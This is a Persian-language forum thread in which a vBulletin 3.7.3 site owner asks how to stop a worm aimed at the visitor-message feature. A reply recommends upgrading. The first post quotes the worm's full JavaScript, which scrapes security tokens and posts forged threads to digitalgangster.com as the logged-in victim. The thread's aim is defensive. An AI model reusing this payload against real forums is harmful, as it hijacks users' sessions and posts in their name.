نمایش نتایج: از شماره 1 تا 2 , از مجموع 2

موضوع: کسی راه مقابله با کرم 3.7.3 را بلد است؟

  1. #1
    تاریخ عضویت
    Feb 2010
    نوشته ها
    272
    سپاس ها
    99
    سپاس شده 135 در 80 پست

    پیش فرض کسی راه مقابله با کرم 3.7.3 را بلد است؟

    در اینترنت که در مورد وی بی 3.7.3 جستجو می کردم . به مطلبی برخوردم که نوشته بود [برای مشاهده لینک ها عضو سایت شوید برای عضویت در سایت بر روی اینجا کلیک کنید] 3.7.3 از لحاظ امنیتی مشکل دارد. ( و اگر درست ترجمه کرده باشم!) قسمت پیام بازدید کنندگان ان نفوذ پذیر است!
    اتفاقا یک کرم اینترنتی هم برای ان نوشته بودند و در سایت ها گذاشته بودند
    ----------------

    function getNewHttpObject() {
    var objType = false;
    try {
    objType = new ActiveXObject('Msxml2.XMLHTTP');
    } catch(e) {
    try {
    objType = new ActiveXObject('Microsoft.XMLHTTP');
    } catch(e) {
    objType = new XMLHttpRequest();
    }
    }
    return objType;
    }

    function getAXAH(url){

    var theHttpRequest = getNewHttpObject();
    theHttpRequest.onreadystatechange = function() {processAXAH();};
    theHttpRequest.open("GET", url);
    theHttpRequest.send(false);

    function processAXAH(){
    if (theHttpRequest.readyState == 4) {
    if (theHttpRequest.status == 200) {

    var str = theHttpRequest.responseText;
    var secloc = str.indexOf('var SECURITYTOKEN = "');
    var sectok = str.substring(21+secloc,secloc+51+21);

    var posloc = str.indexOf('posthash" value="');
    var postok = str.substring(17+posloc,posloc+32+17);

    var subject = 'subject text';
    var message = 'message text';

    postAXAH('http://digitalgangster.com/4um/newthread.php?do=postthread&f=5', 'subject=' + subject + '&message=' + message + '&wysiwyg=0&taglist=&iconid=0&s=&securitytoken=' + sectok + '&f=5&do=postthread&posthash=' + postok + 'poststarttime=1&loggedinuser=1&sbutton=Submit+New +Thread&signature=1&parseurl=1&emailupdate=0&pollo ptions=4');

    }
    }
    }
    }








    function postAXAH(url, params) {
    var theHttpRequest = getNewHttpObject();

    theHttpRequest.onreadystatechange = function() {processAXAHr(elementContainer);};
    theHttpRequest.open("POST", url);
    theHttpRequest.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded; charset=iso-8859-2');
    theHttpRequest.send(params);

    function processAXAHr(elementContainer){
    if (theHttpRequest.readyState == 4) {
    if (theHttpRequest.status == 200) {

    }
    }
    }
    }


    getAXAH('http://digitalgangster.com/4um/newthread.php?do=newthread&f=5');
    document.write('<iframe src="http://digitalgangster.com/4um/newthread.php?do=newthread&f=5">');

    #IHTeam.net
    ----------------
    من دو تا سوال مهم دارم.
    1- هر کسی این کرم را در قسمت پیام بازدید کنندگان بگذارد سایت هک می شود؟
    2- راه مقابله با آن چیست؟
    3- اگر نسخه انجمن را بالاتر ببری این مشکل حل می شود یا خیر؟

  2. #2
    تاریخ عضویت
    Nov 2007
    محل سکونت
    کرج مهرویلا
    نوشته ها
    16,278
    سپاس ها
    3,268
    سپاس شده 22,446 در 9,367 پست

    پیش فرض پاسخ : کسی راه مقابله با کرم 3.7.3 را بلد است؟

    فکر کنم با قرار دادن این کد ، صفحه پروفایل طرف اون پیغامی که درون کد هست نمایش داده میشه

    -----------------

    آپگراید به ورژن بالاتر بهترین راه هست
    دوستان و همکاران عزیز
    در پیغام خصوصی به سوالات و موارد شما پاسخ داده نخواهد شد
    مگر انهایی که کار طراحی دارند
    لطفا مزاحم نشوید و در سایت مطرح بکنید


    در روزگاری که لبخند آدمها بخاطر شکست توست ، برخیز تا بگریند آدمها ( کوروش کبیر )

    ساعات تماس : 10 & 14 - 18 & 23
    09386942162
    vbsaz.ir@gmail.com




اطلاعات موضوع

کاربرانی که در حال مشاهده این موضوع هستند

در حال حاضر 1 کاربر در حال مشاهده این موضوع است. (0 کاربران و 1 مهمان ها)

کلمات کلیدی این موضوع

مجوز های ارسال و ویرایش

  • شما نمیتوانید موضوع جدیدی ارسال کنید
  • شما امکان ارسال پاسخ را ندارید
  • شما نمیتوانید فایل پیوست کنید.
  • شما نمیتوانید پست های خود را ویرایش کنید
  •